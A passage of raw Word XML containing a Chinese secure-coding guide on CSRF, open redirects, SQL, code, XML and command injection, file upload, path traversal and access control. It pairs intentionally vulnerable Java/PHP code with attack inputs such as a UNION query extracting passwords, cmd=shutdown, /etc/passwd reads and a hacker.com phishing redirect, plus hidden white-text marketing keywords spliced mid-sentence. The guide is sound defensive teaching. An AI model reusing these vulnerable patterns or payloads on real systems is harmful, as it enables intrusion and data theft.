        <w:t>当用户浏览器关闭、或用户再次登录、或退出时，清除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token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。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2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、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在表单中，生成一个隐藏域，它的值就是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COOKIE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中随机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TOKEN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。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3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、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表单被提交后，就可以在接收用户请求的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web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应用中，判断表单中的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TOKEN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值是否和用户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COOKIE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中的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TOKEN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值一致，如果不一致或没有这个值，就判断为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CSRF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攻击，同时记录攻击日志（日志内容见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“Error Handing and Logging”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章节）。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由于攻击者无法预测每一个用户登录时生成的那个随机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TOKEN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值，所以无法伪造这个参数。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示例：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    1 &lt;form method="post" id="xxxx" name="xxxx" style="margin:0px;"&gt;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    2 $csrfToken.hiddenField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    3 ...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    4 &lt;/form&gt;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代码中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$csrfToken.hiddenField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将会生成一个隐藏域，用于生成验证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token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，它将会作为表单的其中一个参数一起提交。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建议使用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CSRF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防御框架，覆盖所有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web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应用，示例参考《中文站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CSRF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攻击防御方案》，该方案适用于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java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项目。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 </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>软件开发</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>手机软件</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>桌面软件</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用系统</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>微信平台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 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注意：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当出现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GET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请求修改用户数据时，一旦在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url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中出现了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csrftoken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，当前页面就不允许出现用户定义的站外链接，否则攻击者可以引诱用户点击攻击者定义的链接，访问在自己的网站，从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referer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中，获取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url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中的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csrftoken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，造成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csrftoken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泄露。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常见问题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1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、为什么不直接验证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referer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？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网站内部，也可以发出的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CSRF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攻击。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2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、如果先发生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xss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攻击，攻击者可以拿到用户页面的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token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怎么办？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CSRF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防御，是建立在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XSS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防御之后的防御。如果已经出现了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XSS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漏洞，攻击者就可以拿到用户页面中的所有信息，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CSRF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防御会失去效果，必须做好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XSS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防范。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4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、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所有表单都会受到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CSRF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漏洞影响么？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所有修改用户个人信息的请求，都会受到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CSRF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漏洞影响。如果一个表单功能只是查询，不会修改任何数据，就不会受到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CSRF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漏洞影响。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URL redirect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安全威胁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URL redirect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，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URL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跳转攻击。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Web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应用程序接收到用户提交的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URL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参数后，没有对参数做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“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可信任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URL”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的验证，就向用户浏览器返回跳转到该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URL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的指令。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如果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alibaba.com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下的某个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web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应用程序存在这个漏洞，恶意攻击者可以发送给用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lastRenderedPageBreak/>
        <w:t>户一个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alibaba.com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的链接，但是用户打开后，却来到钓鱼网站页面，将会导致用户被钓鱼攻击，账号被盗，或账号相关财产被盗。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 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代码示例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这是一段没有验证目的地址，就直接跳转的经典代码：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if(checklogin(request)){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  response.sendRedirect(request.getParameter("url"));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}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这段代码存在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URL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跳转漏洞，当用户登陆成功后，会跳转到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url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参数所指向的地址。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攻击方法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一个正常的流程如下：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1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）买家用户发送一个商品连接给商家用户。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2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）商家用户打开连接，跳转到登陆页面。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3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）商家用户登陆，之后自动跳转到登录前的商品页面。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攻击演示：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如果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“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代码示例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”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中的代码，是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alibaba.com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下的一个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web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应用程序。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1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）攻击者可以发送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http://china.alibaba.com/member/sigin.htm?done=http://www.hacker.com:8080/ali/sigin.htm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诱惑用户打开。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2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）用户打开页面。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显示需要登陆，于是用户输入了账户和密码，登陆。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3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）无论用户输入什么，都跳转到了恶意攻击者指定的钓鱼页面，这个页面显示给用户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“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会员登录名或密码错误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”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，注意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URL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中的链接地址。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4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）用户看到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“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密码错误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”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，就再次输入密码。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由于用户现在看到的页面，其实是恶意攻击者伪造的钓鱼程序，而用户却以为这些操作都是在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alibaba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网站上做的，所以用户在钓鱼程序中输入了密码。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 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解决方案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为了保证用户所点击的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URL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，是从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web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应用程序中生成的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URL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，所以要做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TOKEN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验证。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1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、当用户访问需要生成跳转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URL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的页面时，首先生成随机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token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，并放入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cookie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。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2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、在显示连接的页面上生成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URL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，在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URL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参数中加入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token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。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示例：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http://china.alibaba.com/member/sigin.htm?done=http://www.alibaba.com&amp;token=5743892783432432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lastRenderedPageBreak/>
        <w:t>3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、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应用程序在跳转前，判断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token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是否和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cookie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中的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token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一致，如果不一致，就判定为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URL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跳转攻击，并记录日志（日志内容见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“Error Handing and Logging”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章节）。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4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、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如果在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javascript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中做页面跳转，需要判断域名白名单后，才能跳转。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如果应用只有跳转到阿里巴巴集团网站的需求，可以设置白名单，判断目的地址是否在白名单列表中，如果不在列表中，就判定为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URL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跳转攻击，并记录日志（日志内容见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“Error Handing and Logging”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章节）。不允许配置集团以外网站到白名单列表中。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这两个方案都可以保证所有在应用中发出的重定向地址，都是可信任的地址。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第三章注入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SQL injection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安全威胁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SQL injection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，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SQL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注入攻击。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当应用程序将用户输入的内容，拼接到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SQL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语句中，一起提交给数据库执行时，就会产生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SQL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注入威胁。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 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由于用户的输入，也是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SQL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语句的一部分，所以攻击者可以利用这部分可以控制的内容，注入自己定义的语句，改变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SQL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语句执行逻辑，让数据库执行任意自己需要的指令。通过控制部分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SQL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语句，攻击者可以查询数据库中任何自己需要的数据，利用数据库的一些特性，可以直接获取数据库服务器的系统权限。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本来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SQL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注入攻击需要攻击者对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SQL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语句非常了解，所以对攻击者的技术有一定要求。但是几年前，已经出现了大量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SQL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注入利用工具，可以让任何攻击者，只要点几下鼠标，就能达到攻击效果，这使得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SQL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注入的威胁，极大增加。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代码示例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只要支持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JDBC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查询，并且开发人员使用了语句拼接，都会产生这种漏洞。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Java(jdbc)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示例：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HttpServletRequest request, HttpServletResponse response) {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JdbcConnection conn = new JdbcConnection();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final String sql = "select * from product where pname like '%"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  + request.getParameter("pname") + "%'";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conn.execqueryResultSet(sql);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Java(ibatis)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示例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&lt;select id="unsafe" resultMap="myResultMap"&gt; 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select * from table where name like '%$value$%'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&lt;/select&gt;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UnSafeBean b = (UnSafeBean)sqlMap.queryForObject("value", request.getParameter("name"));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lastRenderedPageBreak/>
        <w:t>PHP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示例：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$sql = "select * from product where pname like '%"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  .$_REQUEST["pname"] . "%'";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mysqli_query($link,$sql);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这里把用户输入的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pname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拼接到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SQL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语句中。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攻击实例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如果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“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代码示例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”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中的代码，是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alibaba.com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下的一个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web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应用程序。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源数据查询地址是：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当攻击者注入自己定义的语句时，访问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URL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为：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http://localhost:8080/struts1/listProduct.htm?pname=e' and 1=2 union select 1,name,pass,4 from user where ''&lt;&gt;'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这时，数据库执行的语句为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select * from product where pname like '%e'  and 1=2 union select 1,name,pass,4 from user where ''&lt;&gt;'%'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加粗部分为用户输入的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pname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的值。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于是执行了关联查询，显示出了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user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表中的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name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和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pass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的字段。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 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攻击者可以利用这种方法，执行任意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SQL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语句。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解决方案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使用预处理执行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SQL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语句，对所有传入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SQL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语句中的变量，做绑定。这样，用户拼接进来的变量，无论内容是什么，都会被当做替代符号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“?”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所替代的值，数据库也不会把恶意用户拼接进来的数据，当做部分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SQL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语句去解析。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Java odbc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示例：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com.mysql.jdbc.Connection conn = db.JdbcConnection.getConn();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final String sql = "select * from product where pname like ?";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java.sql.PreparedStatement ps = (java.sql.PreparedStatement) conn.prepareStatement(sql);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ps.setObject(1, "%"+request.getParameter("pname")+"%");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ResultSet rs = ps.executeQuery();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PHP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示例：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$query = "INSERT INTO myCity (Name, CountryCode, District) VALUES (?,?,?)";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$stmt = $mysqli-&gt;prepare($query);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$stmt-&gt;bind_param("sss", $val1, $val2, $val3);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$val1 = 'Stuttgart';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$val2 = 'DEU';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lastRenderedPageBreak/>
        <w:t>$val3 = 'Baden-Wuerttemberg'; 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/* Execute the statement */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$stmt-&gt;execute();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无论使用了哪个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ORM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框架，都会支持用户自定义拼接语句，经常有人误解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Hibernate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没有这个漏洞，其实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Hibernate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也支持用户执行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JDBC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查询，并且支持用户把变量拼接到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SQL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语句中。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Code injection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安全威胁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Code injection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，代码注入攻击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web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应用代码中，允许接收用户输入一段代码，之后在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web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应用服务器上执行这段代码，并返回给用户。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由于用户可以自定义输入一段代码，在服务器上执行，所以恶意用户可以写一个远程控制木马，直接获取服务器控制权限，所有服务器上的资源都会被恶意用户获取和修改，甚至可以直接控制数据库。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代码示例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示例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1 -- JAVA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servlet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代码：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public void doGet(HttpServletRequest request, HttpServletResponse response)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   throws ServletException, IOException {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  response.setContentType("text/html");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  PrintWriter out = response.getWriter();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  try {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   File file = File.createTempFile("JavaRuntime", ".java", new File( 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     System.getProperty("user.dir")));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   String filename = file.getName();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   String classname = filename.substring(0, filename.length() - 5);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   String[] args = new String[] { "-d",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     System.getProperty("user.dir"), filename };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   PrintWriter outfile = new PrintWriter(new FileOutputStream(file));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   outfile.write("public class " + classname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     + "{public void myfun(String args)" + "{try {"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     + request.getParameter("code")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     + "} catch (Exception e) {}}}");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   outfile.flush();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   outfile.close();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   (new Main()).compile(args, outfile);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   URL url = new URL("file://"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lastRenderedPageBreak/>
        <w:t>     + file.getPath().substring(0, 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       file.getPath().lastIndexOf("\\") + 1));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   java.net.URLClassLoader myloader = new URLClassLoader(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     new URL[] { url }, Thread.currentThread()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       .getContextClassLoader());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   Class cls = myloader.loadClass(classname);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   cls.getMethod("myfun", new Class[] { String.class }).invoke(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     cls.newInstance(), new Object[] { "" });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  } catch (Exception se) {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   se.printStackTrace();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  }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  out.println();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  out.flush();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  out.close();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}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PHP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代码示例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eval($_REQUEST["kxlzx"]);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接收用户输入的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code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参数内容，编译为一个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class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文件，之后调用这个文件相关代码。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示例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2 -- JAVA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一个三方工具包装好的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eval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调用：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import bsh.Interpreter;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Interpreter i = new Interpreter();  </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>微信开发、微信公众平台开发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 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//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这段代码将执行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System.out.println( "kxlzx" );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i.eval("System.out.println( "kxlzx" );"); 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 xml:space="preserve">  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一旦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eval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函数的参数是用户自定义的，将导致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java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代码注入威胁。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详细请参考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http://www.beanshell.org/manual/embeddedmode.html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攻击实例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对于以上的示例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1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中的代码，用户可以构造如下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URL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攻击服务器：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http://www.alibaba.com/servlet/Active?code=System.out.println("kxlzx");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执行结果见下图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解决方案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执行代码的参数，或文件名，禁止和用户输入相关，只能由开发人员定义代码内容，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lastRenderedPageBreak/>
        <w:t>用户只能提交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“1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、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2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、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3”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参数，代表相应代码。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XML injection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安全威胁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XML injection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，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XML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注入安全攻击。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和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SQL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注入原理一样，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XML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是存储数据的地方，如果在查询或修改时，如果没有做转义，直接输入或输出数据，都将导致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XML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注入漏洞。攻击者可以修改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XML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数据格式，增加新的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XML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节点，对数据处理流程产生影响。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代码示例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这里是一个保存注册用户信息为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xml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的例子：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final String GUESTROLE = "guest_role";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... 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//userdata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是准备保存的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xml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数据，接收了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name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和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email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两个用户提交来的数据。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String userdata = "&lt;USER role="+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    GUESTROLE+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    "&gt;&lt;name&gt;"+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    request.getParameter("name")+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    "&lt;/name&gt;&lt;email&gt;"+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    request.getParameter("email")+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    "&lt;/email&gt;&lt;/USER&gt;";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//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保存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xml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userDao.save(userdata);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代码没有做任何过滤。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攻击实例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原本注册用户后，应该产生一条这样的用户记录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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;USER role="guest_role"&gt;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&lt;name&gt;user1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&lt;/name&gt;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&lt;email&gt;user1@a.com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&lt;/email&gt;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&lt;/USER&gt;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但是当恶意用户输入自己的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email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时，输入了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user1@a.com&lt;/email&gt;&lt;/USER&gt;&lt;USER role="admin_role"&gt;&lt;name&gt;kxlzx&lt;/name&gt;&lt;email&gt;user2@a.com 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最终用户注册后，数据就变成了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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;USER role="guest_role"&gt;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lastRenderedPageBreak/>
        <w:t>&lt;name&gt;user1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&lt;/name&gt;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&lt;email&gt;user1@a.com&lt;/email&gt;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&lt;/USER&gt;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&lt;USER role="admin_role"&gt;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&lt;name&gt;kxlzx&lt;/name&gt;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&lt;email&gt;user2@a.com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&lt;/email&gt;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&lt;/USER&gt;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从数据结果看，增加了一条管理员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“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李四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”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。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解决方案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在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XML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保存和展示前，对数据部分，单独做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xml escape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。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String userdata = "&lt;USER role="+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    GUESTROLE+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    "&gt;&lt;name&gt;"+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    StringUtil.xmlencode(request.getParameter("name"))+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    "&lt;/name&gt;&lt;email&gt;"+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    StringUtil.xmlencode(rrequest.getParameter("email"))+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    "&lt;/email&gt;&lt;/USER&gt;"; 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按照以下列表做转义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&amp; --&gt; &amp;amp;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&lt; --&gt; &amp;lt;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&gt; --&gt; &amp;gt;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" --&gt; &amp;quot;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' --&gt; &amp;#39;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System command injection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安全威胁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System command injection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，系统命令注入攻击。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系统命令执行攻击，是指代码中有一段执行系统命令的代码，但是系统命令需要接收用户输入，恶意攻击者可以通过这个功能直接控制服务器。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代码示例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Runtime.getRuntime().exec(request.getParameter("cmd"));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PHP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代码示例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exec($_REQUEST["cmd"]);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lastRenderedPageBreak/>
        <w:t>  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这段代码接收用户传递的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cmd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参数，执行系统命令。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攻击实例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以上代码攻击者可以输入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http://www.alibaba.com/servlet/command?cmd=shutdown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系统就会自动关机。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解决方案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所有需要执行的系统命令，必须是开发人员定义好的，不允许接收用户传来的参数，加入到系统命令中去。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常见问题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任何一个执行系统命令的代码，都必须经过安全工程师确认。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第四章文件操作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File upload </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>传世移动互联网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 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名称定义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File upload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，任意文件上传攻击。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Web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应用程序在处理用户上传的文件时，没有判断文件的扩展名是否在允许的范围内，就把文件保存在服务器上，导致恶意用户可以上传任意文件，甚至上传脚本木马到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web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服务器上，直接控制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web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服务器。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代码示例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处理用户上传文件请求的代码，这段代码没有过滤文件扩展名。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PrintWriter pw = new PrintWriter(new BufferedWriter(new FileWriter(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  request.getRealPath("/")+getFIlename(request))));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ServletInputStream in = request.getInputStream();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int i = in.read();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while (i != -1) {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pw.print((char) i);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i = in.read();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}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pw.close();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PHP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代码示例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file_put_contents($_REQUEST["filename"],$_REQUEST["context"]);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攻击实例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如果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“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代码示例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”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中的代码，是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alibaba.com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下的一个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web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应用程序。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这段代码将直接把用户上传的文件，保存在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web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目录中，上传后，用户可以通过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lastRenderedPageBreak/>
        <w:t>http://www.alibaba.com/jspmuma.jsp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访问上传的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JSP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木马，控制服务器，下图为上传的木马：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 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即使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jsp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文件不会被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web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容器解析执行，攻击者也可以上传自定义的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htm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文件，造成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XSS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攻击。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解决方案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处理用户上传文件，要做以下检查：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1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、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检查上传文件扩展名白名单，不属于白名单内，不允许上传。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2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、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上传文件的目录必须是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http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请求无法直接访问到的。如果需要访问的，必须上传到其他（和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web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服务器不同的）域名下，并设置该目录为不解析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jsp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等脚本语言的目录。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3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、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上传文件要保存的文件名和目录名由系统根据时间生成，不允许用户自定义。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4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、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图片上传，要通过处理（缩略图、水印等），无异常后才能保存到服务器。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5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、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上传文件需要做日志记录，请参照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“Error Handing and Logging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章节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”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。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File download and Directory traversal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安全威胁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File download and Directory traversal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，任意文件下载攻击和目录遍历攻击。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处理用户请求下载文件时，允许用户提交任意文件路径，并把服务器上对应的文件直接发送给用户，这将造成任意文件下载威胁。如果让用户提交文件目录地址，就把目录下的文件列表发给用户，会造成目录遍历安全威胁。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恶意用户会变换目录或文件地址，下载服务器上的敏感文件、数据库链接配置文件、网站源代码等。</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>广东传世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 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代码示例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处理用户请求的代码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String path = request.getParameter("path");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java.io.OutputStream os = response.getOutputStream();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java.io.FileInputStream fis = new java.io.FileInputStream(path);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byte[] b = new byte[1024];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int i = 0;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while ((i = fis.read(b)) &gt; 0 ){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os.write(b, 0, i);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}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fis.close();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os.flush();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os.close();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PHP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代码示例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lastRenderedPageBreak/>
        <w:t>$o = file_get_contents($filename);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echo $o;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这段代码根据用户提交的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path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，从服务器上获取指定文件，展示给用户。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攻击实例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攻击者会变化参数中的文件名，下载服务器中的敏感文件，数据库配置文件等。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示例：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http://www.alibaba.com/filedownload.do?filename=/etc/passwd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解决方案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对文件操作功能，做到以下几点：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1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，要下载的文件地址保存至数据库中。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2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，文件路径保存至数据库，让用户提交文件对应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ID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下载文件。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3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，下载文件之前做权限判断。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4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，文件放在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web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无法直接访问的目录下。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 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5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，记录文件下载日志（内容见日志章节）。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6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，不允许提供目录遍历服务。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记录不符合规范的上传文件日志（日志内容请参考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“Error Handing and Logging”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章节）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第五章访问控制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Vertical Access Control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名称定义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Vertical Access Control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，垂直权限安全攻击，也就是权限提升攻击。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由于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web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应用程序没有做权限控制，或仅仅在菜单上做了权限控制，导致的恶意用户只要猜测其他管理页面的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URL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，就可以访问或控制其他角色拥有的数据或页面，达到权限提升目的。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这个威胁可能导致普通用户变成管理员权限。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代码示例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一个仅仅做了菜单控制的代码：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&lt;tr&gt;&lt;td&gt;&lt;a href="/user.jsp"&gt;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管理个人信息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&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;%if (power.indexOf("administrators")&gt;-1){%&gt;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&lt;tr&gt;&lt;td&gt;&lt;a href="/userlist.jsp"&gt;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管理所有用户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&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;%}%&gt;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攻击方法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恶意用户，可以直接猜测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“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管理所有用户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”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的页面，通过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URL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访问，看到管理员页面。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解决方案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 </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>品牌营销</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>网站建设</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>策划营销</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>运营推广</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>电商服务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 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在打开管理页面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URL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时，首先判断当前用户是否拥有该页面的权限，如果没有权限，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lastRenderedPageBreak/>
        <w:t>就判定为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“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权限提升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”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攻击，同时记录安全日志（日志内容请参考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“Error Handing and Logging”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章节）。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建议使用成熟的权限框架处理权限问题，比如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spring security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。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Horizontal Access Control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安全威胁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Horizontal Access Control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，访问控制攻击，也就是水平权限安全攻击。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Web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应用程序接收到用户请求，修改某条数据时，没有判断数据的所属人，或判断数据所属人时，从用户提交的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request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参数（用户可控数据）中，获取了数据所属人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id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，导致恶意攻击者可以通过变换数据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ID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，或变换所属人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id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，修改不属于自己的数据。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恶意用户可以删除或修改其他人数据。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代码示例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访问数据层（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dao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），所有的更新语句操作，都可能产生这个漏洞。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以下代码存在这个漏洞，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web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应用在修改用户个人信息时，从从用户提交的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request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参数（用户可控数据）中，获取了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userid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，执行修改操作。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修改用户个人信息页面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&lt;form action="/struts1/edituser.htm" method="post"&gt;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&lt;input name="userid" type="hidden" value="&lt;%=userid%&gt;"&gt; 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    &lt;table border="1"&gt;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&lt;tr&gt;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&lt;td&gt;username:&lt;/td&gt;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&lt;td&gt;&lt;%=rs.getString("name")%&gt;&lt;/td&gt;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&lt;/tr&gt;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&lt;tr&gt;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&lt;td&gt;passwd:&lt;/td&gt;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&lt;td&gt; &lt;input name="pass" value="&lt;%=rs.getString("pass")%&gt;"&gt;&lt;/td&gt;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&lt;/tr&gt;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&lt;tr&gt;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&lt;td&gt;type:&lt;/td&gt;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&lt;td&gt;&lt;%=rs.getString("type")%&gt;&lt;/td&gt;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&lt;/tr&gt;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&lt;tr&gt;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&lt;td&gt;realname:&lt;/td&gt;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&lt;td&gt;&lt;input name="realname" value="&lt;%=rs.getString("realname")%&gt;"&gt;&lt;/td&gt;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&lt;/tr&gt;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&lt;tr&gt;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&lt;td&gt;email:&lt;/td&gt;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&lt;td&gt; &lt;input name="email" value="&lt;%=rs.getString("email")%&gt;"&gt;&lt;/td&gt;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&lt;/tr&gt;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lastRenderedPageBreak/>
        <w:t>&lt;tr&gt;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&lt;td&gt;tel:&lt;/td&gt;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&lt;td&gt; &lt;input name="tel" value="&lt;%=rs.getString("tel")%&gt;"&gt;&lt;/td&gt; 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&lt;/tr&gt;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&lt;/table&gt;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&lt;html:submit/&gt;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&lt;/form&gt;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表单中，将用户的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useird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作为隐藏字段，提交给处理修改个人信息的应用。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下面代码是修改个人信息的应用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int userid=Integer.valueOf( request.getParameter("userid"));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String email=request.getParameter("email");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String tel=request.getParameter("tel");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String realname=request.getParameter("realname");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String pass=request.getParameter("pass");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JdbcConnection conn = null;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try {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conn = new JdbcConnection();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Object[] params = new Object[5];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params[0] = email;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params[1] = tel;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params[2] = realname;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params[3] = pass;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params[4] = userid;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final String sql = "update user set email=?,tel=?,realname=?,pass=? where userid=?";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conn.execUpdate(sql,params);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conn.closeConn();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这段代码是从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request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的参数列表中，获取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userid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，也就是表单提交上来的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userid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，之后修改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userid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对应的用户数据。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 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而表单中的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userid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是可以让用户随意修改的。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攻击实例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攻击者通常在修改数据时，变化数据的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id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，如果存在这个漏洞，就可以修改成功。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如果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“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代码示例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”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中的代码，是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alibaba.com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下的一个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web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应用程序。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攻击者通过一个浏览器插件，拦截提交的数据，并修改了这个数据，如下图：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修改后，提交，即可修改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userid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所对应的其他用户的数据。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这个例子是判断了所属人，但是却从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“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用户可控数据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”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中，获取了所属人。还有一种形式是没有判断所属人，直接修改数据。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lastRenderedPageBreak/>
        <w:t>解决方案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从用户的加密认证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cookie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中，获取当前用户的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id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，并且需要在执行的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SQL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语句中，加入当前用户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id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作为条件语句。由于是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web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应用控制的加密算法，所以恶意用户无法修改加密信息。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示例代码：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int userid=Integer.valueOf( GetUseridFromCookie(request));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String email=request.getParameter("email");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String tel=request.getParameter("tel");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String realname=request.getParameter("realname");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String pass=request.getParameter("pass");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JdbcConnection conn = null; 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try {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conn = new JdbcConnection();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Object[] params = new Object[5];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params[0] = email;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params[1] = tel;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params[2] = realname;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params[3] = pass;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params[4] = userid;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final String sql = "update user set email=?,tel=?,realname=?,pass=? where userid=?";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conn.execUpdate(sql,params);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conn.closeConn();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代码中通过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GetUseridFromCookie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，从加密的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COOKIE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中获取了当前用户的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id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，并加入到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SQL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语句中的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WHERE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条件中。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常见问题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并不是所有的语句都有这个漏洞，有些是定时任务，或后台管理员执行的，这些必须和开发人员一一确认。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第六章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 xml:space="preserve"> Session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管理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Cookie httponly flag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安全威胁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Cookie http 